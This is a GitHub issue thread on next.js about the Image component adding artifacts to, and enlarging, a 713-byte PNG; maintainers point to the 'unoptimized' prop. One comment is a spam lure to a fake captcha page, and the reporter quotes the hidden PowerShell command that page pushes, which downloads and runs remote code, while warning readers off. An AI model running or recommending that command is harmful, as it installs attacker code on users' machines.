### ISSUE TITLE
Image component shows compression artifacts, and increases the image's size, on very small pngs

### ISSUE THREAD

**Issue by city41** [vercel/next.js#72140]
### Link to the code that reproduces this issue

https://github.com/city41/next-image-compression-issue

### To Reproduce

Run the `next-image-compression-issue` app, then compare the two images in Chrome. I am using Chrome 130.0.6723.69

### Current vs. Expected behavior

expected: the image is crisp and clear
actual: the image has compression artifacts and a noticeable reduction of color.

![compressionIssue](https://github.com/user-attachments/assets/95d937af-c2f7-42b0-866a-33c5211bf9ba)

The difference is most obvious on the right. The dog has a reduction in color and overall clarity, and the blue stripes (which are a single blue color in the original png) take on artifacts from the dog.

### Provide environment information

```bash
Operating System:
  Platform: linux
  Arch: x64
  Version: #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024
  Available memory (MB): 32025
  Available CPU cores: 8
Binaries:
  Node: 18.18.2
  npm: 9.8.1
  Yarn: 1.22.21
  pnpm: N/A
Relevant Packages:
  next: 15.0.2 // Latest available version is detected (15.0.2).
  eslint-config-next: 15.0.2
  react: 19.0.0-rc-02c0e824-20241028
  react-dom: 19.0.0-rc-02c0e824-20241028
  typescript: 5.6.3
Next.js Config:
  output: N/A
```

### Which area(s) are affected? (Select all that apply)

Image (next/image)

### Which stage(s) are affected? (Select all that apply)

next dev (local), next build (local), Vercel (Deployed)

### Additional context

The original png image is only 713 bytes. The webp that `Image` produces is 884 bytes. So it's a double whammy of worse quality and larger file size.

**Comment by city41** [comment]
I forgot to mention, this happens seemingly regardless of the `quality` prop. Setting it to 100 still has the compression related issues.

**Comment by jdpoccorie** [comment]
Perhaps this solution will help you figure out the problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)

**Comment by city41** [comment]
That website is trying to run `powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://javierlopez.eu/adapt/kingdom))).Invoke()` on a Windows computer. 

DO NOT FOLLOW ITS INSTRUCTIONS

I am reporting this to github.

**Comment by ucarno** [comment]
As a workaround, you can make pixel art images `unoptimized`:
https://nextjs.org/docs/app/api-reference/components/image#unoptimized

**Comment by city41** [comment]
Oh cool, I didn't know that prop was available. I see it's not in the summary of props but is listed down below, so I missed it.

I'd even say this is not a workaround but the solution.

Thanks!

**Comment by styfle** [comment]
> The original png image is only 713 bytes

You shouldn't try to optimize an image this small since its unlikely to get any smaller. You can set `unoptimized: true` to bypass the image optimization api and serve the image as-is.

We could probably add a heuristic in the api to detect images less than 1KB and serve as-is.

**Comment by city41** [comment]
I think using `unoptimized` is a good solution. My bad I missed it in the docs

**Comment by styfle** [comment]
I'll update the docs to make this a little more clear:

- https://github.com/vercel/next.js/pull/73604
